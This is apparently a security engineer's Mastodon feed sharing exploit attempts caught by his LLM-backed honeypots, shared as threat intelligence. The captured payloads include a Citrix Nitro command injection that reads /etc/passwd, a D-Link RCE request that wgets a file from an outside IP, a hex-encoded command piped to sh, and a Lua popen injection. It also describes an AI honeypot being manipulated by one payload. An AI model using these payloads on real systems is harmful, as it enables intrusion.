Niels Heinen

@[email protected]
68 Followers
61 Following
82 Posts
Information security engineer - security at scale - honeypots
Githubhttps://github.com/mrheinen
Show threadNiels HeinenFeb 15
It looks like a variant of https://www.exploit-db.com/exploits/36442
Citrix Nitro SDK - Command Injection

Citrix Nitro SDK - Command Injection. CVE-119834CVE-2015-2838 . webapps exploit for Linux platform

Exploit Database
Niels HeinenFeb 15

Interesting Netscaler payload caught by my Lophiid honeypots:

GET /nitro/v1/config/systemfile?args=filename:/etc/passwd%3Bping%20-c%204%20178.16.54.17 HTTP/1.1
Host: x.x.x.x
Connection: close
X-Nitro-Pass: nsroot
X-Nitro-User: nsroot

Does anyone know this vuln ?

#honeypot #dfir #infosec #cybersecurity

Niels HeinenFeb 9
After adding emulation of HPE OneView to my honeypots, I'm seeing quite an uptick in scans for it. Could be coincidence but regardless it's interesting to see so much traffic for a rather unpopular (?) service. Shodan for example shows 27 instances at the moment.

#infosec #cybersecurity #dfir #honeypot
Niels HeinenJan 26
Chris John Riley  Jan 25

Just under a year ago I was planning to leave Google after 10 years. Since then I've been considering what's next (and doing some advisory work on the side).

I've slowly been giving more and more thought to how to give back in a sustainable way that works for me.

With that in mind, if you know of any organisations who offer security consulting/testing (pentesting) for NGOs or other worthy causes, please share 🙏

(Please re-toot for reach)

Niels HeinenJan 26

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I see this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel

Niels HeinenJan 17

My lophiid honeypots use varies LLM models for different tasks. For shell code execution emulation they use Gemini 2.5 flash and it dealt with this payload really nicely:

echo 7c6563686f2532305243455f544553545f313233 | xxd -r -p | sh

It correctly understood that xxd reversed the hex and it understood that the resulting string were shell commands that echoed the string "RCE_TEST_123"

I think this is pretty cool. Shell code emulation with LLMs has a lot of potential

#infosec #dfir #honeypot

Niels HeinenDec 31

Stubborn AI honeypots give me grey hair.

Attacker sends payload:

"username=anonymous%00]]%0dlocal+h+%3d+io.popen("this is vulnerable to CVE-2025-47812")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=
"

And the AI responsible for handling the response sends the following back to the attacker:

"This system is not affected by CVE-2025-47812.
"

*sigh*

#dfir #infosec #cybersecurity #honeypot

Niels HeinenDec 28

My Lophiid honeypots got spammed with a payloads like "234513+true+1994175". The LLM integration understood the intricacies of Javascript and caused the honeypots to respond with the correct answer 2228689

#honeypot #dfir #infosec #aisecurity #cybersecurity #llm

Niels HeinenDec 24

#react2shell exploitation seems to have reached a peak today. Exploit attempts since last week (against my honeypots)

day | request_count
------------+---------------
2025-12-24 | 41209
2025-12-23 | 19835
2025-12-22 | 34962
2025-12-21 | 13141
2025-12-20 | 15490
2025-12-19 | 22307
2025-12-18 | 9901
2025-12-17 | 18376

#honeypot #infosec #dfir #cybersecurity

Niels HeinenDec 15

Found in a #react2shell payload

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxtherespoopalloverme

I refuse to grow up: things like this make me smile ;-)

#honeypot #dfir #infosec #cybersecurity